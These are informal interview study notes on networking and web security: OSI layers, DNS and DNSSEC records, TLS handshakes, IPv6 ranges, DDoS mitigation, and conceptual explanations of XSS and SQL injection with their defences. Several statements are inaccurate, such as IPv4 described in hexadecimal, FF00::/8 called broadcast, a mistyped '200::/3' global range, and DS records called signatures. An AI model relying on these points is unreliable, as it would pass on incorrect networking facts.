Notes for some interview questions.
Data link layer. Switches are working on this layer, so when we talk about mac address, node to node connection, it's all happened here.
Network layer. IP/ICMP protocol are for this layer. IP address, router, routing to other routers hanppend at this layer.
Transport layer. TCP/UDP protocol are for this layer, it defines how packet data forward, and the packet speed, rate, etc.
Session layer. SSL/TLS may be present at this layer.
Presentation layer. PNG/JPEG encoding?
Application layer. This is the layer we interactive with everyday, http, ftp, ssh are present at this layer.
Just remember 'All People Seem To Need Data Processing', the first letter present the layer order.
A: Which IP address is/are a domain point to.
CNAME: A domain can point to an other domain name.
PTR: Reverse record for IP, find which domain point to this IP address.
DNSKEY: KSK/ZSK, the public key to decrypt and check RRSIG.
RRSIG: The DNS record digital signature, we can use the DNSKEY decrypt and check the hash value to determine if the dns record has been modified.
DS: A digital signature that generate by upper authority use DNSKEY and their private key. So we can use the upper authority's DNSKEY to decrypt and check if the DNSKEY returned by these level has been modified.
Authoritative DNS: Authoritative dns holds the actual DNS records for that domain.
Recursive resolver: Recursive resolver not holds the actual DNS records, it will request records from an authoritative DNS. The DNS resolve processing is, DNS resolver -> Root server(.) -> TLD server(.com) -> Authoritative server.
unicast: One node to one node
multicast: One node to multiple nodes at same time
broadcast: One node to all nodes
anycast: One node to multiple nodes, but to one node at exact the moment, use route to control what server will be connected. We can use Border Gateway Protocol (BGP) and Autonomous Systems (AS) to depoly an anycast ip.
ping: Send ICMP packet to determine weather the destination host is alive.
Traceroute: Print the route to the dest, and the connectability to each hop host use UDP packet
MTR: Combine ping and traceroute, send ICMP packet to every hop, can be set to use UDP or TCP instead.
How can we know each hop is? It Use TTL trick to check the router’s ip and response time. But sometimes a router many be just drop the TTL exceeded packet and will not make a response.
Symmetric algorithm and asymmetric encryption.
Use previous session secret to connected the server.
ClientHello: ssl version, cipher suites, random number 1
ServerHello: confirmed ssl version, cipher suites, and server certificate, random number 2
Client check the certificate use root CAs (public key) integrated with the browser or the system, check the digital signature hash value to determine if the certificate is modified or invalid (may be the valid time is expired).
Client generate random number 3, and generate session secret use the number 1-3 and the server’s public key, send to server.
server decrypt the session secret and check if it’s correct, then use this session secret to encrypt data with client.
SSL fist developed by Netscape, it’s first just for http connection. SSLv2, v3
TLS is an open standard, designed to be application independent. TLS1.2, 1.3
DoT: DNS over TLS, like HTTP over TLS, port 853.
DoH: DNS over HTTPS, port 443.
ipv4: 2(2 hexadecimal character) x 4(groups) x 4(each hexadecimal character changes to 4 binary number) = 32 bit
ipv6: 4(4 hexadecimal character) x 8(groups) x 4 = 128 bit
':' is named as colon in English.
link local: `FE80::/10` like 169.x, not routed internally or externally.
unique local: `FC00::/7 and FC00:: - FDFF::` like 192.x, not routed on internet.
global unicast: public address, `200::/3`, routed on internet.
`FF00::/8`: broadcast address.
`::1/128 `: 127.0.0.1.
DDos is distributed denial-of-service.
Gain control of a network of online machines in order to carry out an attack.
Causing the targeted server or network to overflow capacity.
Application Layer Attack: HTTP flood.
Protocol Attack: SYN Flood.
Amplification: DNS, NTP.
Black Hole Routing
Web Application Firewall
Anycast Network Diffusion
hijack the DNS results, lead the user to the fishing site.
Use HTTPS to avoid.
XSS is cross site scripting.
When a site is allowing user upload image or submit form and then display the post and didn't processe correctly , it maybe cause a XSS attack.
User can post some text include a script tag, and if the tag haven’t escaped correctly, every user viewing this post will run the script which the hosted by the attacker, and this can be lead lots of problems, like steal user login credentials, monitor user.
When developer use an user input to generate a SQL to run in the database, if haven’t processed correctly there maybe a SQL injection. Attacker could submit some string to change the perpose of the query.
Always use prepare to run the sql, and quote the user's inputs.
Do not need to run daemons, and don't need databases, very minimal installation requirements.
Connecting to a server using SSH (or WS-Man/WinRM for Windows), copies the Python code over, executes it and then removes itself.
Use HTTP2: Gain the performance provide by http2, change multiple connection to 1 connection per domain, reduce http requests.
Image lazy-load, reduce image quality, use PNG or Web.P.
Set correct cache header, use browser cache.
Use anycast to avoid DDOS attack, and give user the nearest data center.
Use CDN or cache layer in web deployment.
Separate css/js domains with data api to decrease header size, bandwidth, and increase the request limit per domain.
Use iconfonts to replace icon image, merge separate small images into one to reduce user requests.